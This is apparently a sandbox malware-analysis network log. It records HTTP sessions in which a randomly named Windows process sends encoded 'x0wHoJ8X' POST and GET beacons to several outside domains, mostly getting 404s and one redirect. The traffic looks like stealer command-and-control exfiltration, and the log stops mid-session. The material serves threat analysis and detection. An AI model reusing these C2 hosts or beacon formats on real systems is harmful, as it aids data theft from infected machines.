                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 2b 30 30 75 34 7a 46 74 57 56 6b 56 77 53 57 30 58 63 39 55 37 69 4e 49 50 57 52 57 56 4a 49 38 64 58 66 36 53 62 47 58 51 2b 4f 6c 7a 4c 66 65 75 78 32 2f 34 32 35 69 79 59 52 66 34 41 79 7a 43 38 61 4d 4b 4e 68 31 35 6a 6d 5a 54 56 76 6b 32 48 2b 56 58 38 79 65 59 78 36 49 6a 36 61 79 4b 72 78 55 30 70 70 2f 67 59 42 47 38 36 79 56 62 49 6f 46 35 2f 53 36 4d 62 33 68 67 5a 43 6e 4f 58 64 39 63 46 54 4e 6e 44 67 70 32 6f 74 47 53 6a 47 4b 39 69 33 54 32 6c 47 39 63 71 78 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=... [TRUNCATED]
                                                        Timestamp: Sep 18, 2024 16:19:35.871685982 CEST | Bytes transferred: 500 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:35 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 53638 | Destination IP: 91.184.0.200 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:19:37.691410065 CEST | Bytes transferred: 568 | Direction: OUT | Data: GET /ikh0/?2VDlJ=Z2VdhTx&x0wHoJ8X=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1jr66Q514zDlJHSMgPbfeUgvtl8EMtFUh5bwjyzdjbkT63w== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Timestamp: Sep 18, 2024 16:19:38.348726988 CEST | Bytes transferred: 500 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:38 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 53639 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:19:43.398394108 CEST | Bytes transferred: 807 | Direction: OUT | Data: POST /h7lb/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Origin: http://www.dyme.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dyme.tech/h7lb/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 74 65 63 77 35 44 6a 4a 59 66 45 44 4c 59 69 41 6b 50 78 51 36 35 73 7a 73 41 63 67 32 56 6f 46 32 6a 37 30 53 62 38 3d
                                                        Data Ascii: x0wHoJ8X=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Ktecw5DjJYfEDLYiAkPxQ65szsAcg2VoF2j70Sb8=


                                                        Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 53640 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:19:45.944848061 CEST | Bytes transferred: 827 | Direction: OUT | Data: POST /h7lb/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Origin: http://www.dyme.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dyme.tech/h7lb/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 41 4c 38 54 55 58 6e 6c 4a 73 73 41 72 45 4d 4d 6f 44 68 2b 4b 72 34 58 4a 66 42 77 59 75 47 4b 6e 34 74 41 52 68
                                                        Data Ascii: x0wHoJ8X=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZAL8TUXnlJssArEMMoDh+Kr4XJfBwYuGKn4tARh


                                                        Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 53641 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:19:48.491103888 CEST | Bytes transferred: 1844 | Direction: OUT | Data: POST /h7lb/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Origin: http://www.dyme.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dyme.tech/h7lb/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 41 71 4c 72 53 73 71 73 35 66 6f 50 6b 74 77 43 51 6e 31 79 70 32 79 44 66 44 4f 73 4d 65 73 64 71 66 39 44 35 61 4d 43 4e 59 63 2f 48 51 68 77 70 76 6b 77 65 71 38 42 6d 62 55 69 37 35 74 48 59 78 66 2b 43 2b 6e 77 64 4c 50 58 33 7a 33 32 73 73 58 6e 36 71 30 44 41 59 6e 38 59 57 65 59 72 7a 62 32 68 68 4c 4f 55 36 79 4f 45 6d 39 64 49 58 72 45 49 61 35 39 6a 35 61 46 65 49 6d 38 66 6c 48 54 78 68 44 6f 59 52 57 4a 30 78 42 47 6b 44 37 49 52 35 53 76 63 45 37 43 74 56 67 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/AqLrSsqs5foPktwCQn1yp2yDfDOsMesdqf9D5aMCNYc/HQhwpvkweq8BmbUi75tHYxf+C+nwdLPX3z32ssXn6q0DAYn8YWeYrzb2hhLOU6yOEm9dIXrEIa59j5aFeIm8flHTxhDoYRWJ0xBGkD7IR5SvcE7CtVgp2K99SCM65sdBt7AlsktZeF79krTExzicIb+lgz0nILLi84nKkxRK8pO+3vtgMiC4p2ppuRUiXYSDjly+hwLGCBty5kix6G1sqqC8khOuqFaQVRw+zvKB7TdJ/bqZMOEew2MFomKjadc7mb0svIFhVLmm1BizkLWBDY2R3p9y+NpFYvHDEDCs9Y4zzeZURaN81snGPSHnLEvbasDzb40WgiYzLy+GHc+rJVZrjgwJMzBT2GQCGWRkcEThwHPNIK+XpHVDnsf4PMflEViqrGk9RZ+HiKUjiVNxVaUlViVNRC+uQPO7dxxkQjLttnW9w/3IwWLRvFJu9v7e6Pjx2qo08bJpMli3AbTfmZOTKmyj+jhZnbAjy7hdkfkxBpyZvhOv/w72wnchAvhyF8HSjPpEoZDPgS52KHfTpsRI6JM+sgpWbJt4weQ2FVBiVp9eYLm2/jSQDiKyQvm8ISuMyzT7RY6aO7PeRnivHoyubVwMojv93AnjHhfHFPXSePZoZcPZggF4l4R8NfCRY0WE3v95SqenvPeq6kKLfOxgf+pnGgTDDEf1bWLDIFQwXaGuI+5+MS3yfdhjipg9dF9GlMUsf83qo7nFkO/eRupRrdH2PxcJCnLordUnuJWmWpyr+/pATXwSipRXl9STVsDK52ptGd7e2QIaYD0oK [TRUNCATED]


                                                        Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 53642 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:19:51.036479950 CEST | Bytes transferred: 558 | Direction: OUT | Data: GET /h7lb/?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Timestamp: Sep 18, 2024 16:19:51.502353907 CEST | Bytes transferred: 410 | Direction: IN | Data: HTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Wed, 18 Sep 2024 14:19:51 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 270
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 30 77 48 6f 4a 38 58 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 42 49 65 6c 4a 35 47 4f 35 31 47 47 4d 58 56 69 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 5a 63 77 6d 6b 4a 62 7a 79 66 64 39 73 7a 49 49 72 5a 57 74 30 66 73 50 5a 6f 51 48 2b 46 7a 68 74 37 32 4b 4f 55 30 52 47 42 75 63 74 41 3d 3d 26 32 56 44 6c 4a 3d 5a 32 56 64 68 54 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTx"}</script></head></html>


                                                        Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 53647 | Destination IP: 43.242.202.169 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:20:11.031505108 CEST | Bytes transferred: 816 | Direction: OUT | Data: POST /e0nr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Origin: http://www.mizuquan.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mizuquan.top/e0nr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 75 67 4e 4c 49 47 72 63 47 31 59 67 4d 75 69 72 44 39 4f 5a 34 77 33 46 46 67 47 37 2b 6f 48 61 50 68 48 75 2b 49 3d
                                                        Data Ascii: x0wHoJ8X=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPugNLIGrcG1YgMuirD9OZ4w3FFgG7+oHaPhHu+I=
                                                        Timestamp: Sep 18, 2024 16:20:11.912388086 CEST | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                        Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 53648 | Destination IP: 43.242.202.169 | Destination Port: 80 | PID: 1788 | Process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp: Sep 18, 2024 16:20:13.630875111 CEST | Bytes transferred: 836 | Direction: OUT | Data: POST /e0nr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Origin: http://www.mizuquan.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mizuquan.top/e0nr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 63 50 56 57 6f 78 71 4f 4a 75 41 73 78 33 77 70 64 4b 4c 48 33 64 31 4a 71 64 68 71 4b 7a 48 6c 66 4c 34 36 59 4f
                                                        Data Ascii: x0wHoJ8X=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYcPVWoxqOJuAsx3wpdKLH3d1JqdhqKzHlfL46YO
                                                        Sep 18, 2024 16:20:14.670156956 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        31 | 192.168.2.5 | 53649 | 43.242.202.169 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:16.333942890 CEST | 1853 | OUT | POST /e0nr/ HTTP/1.1
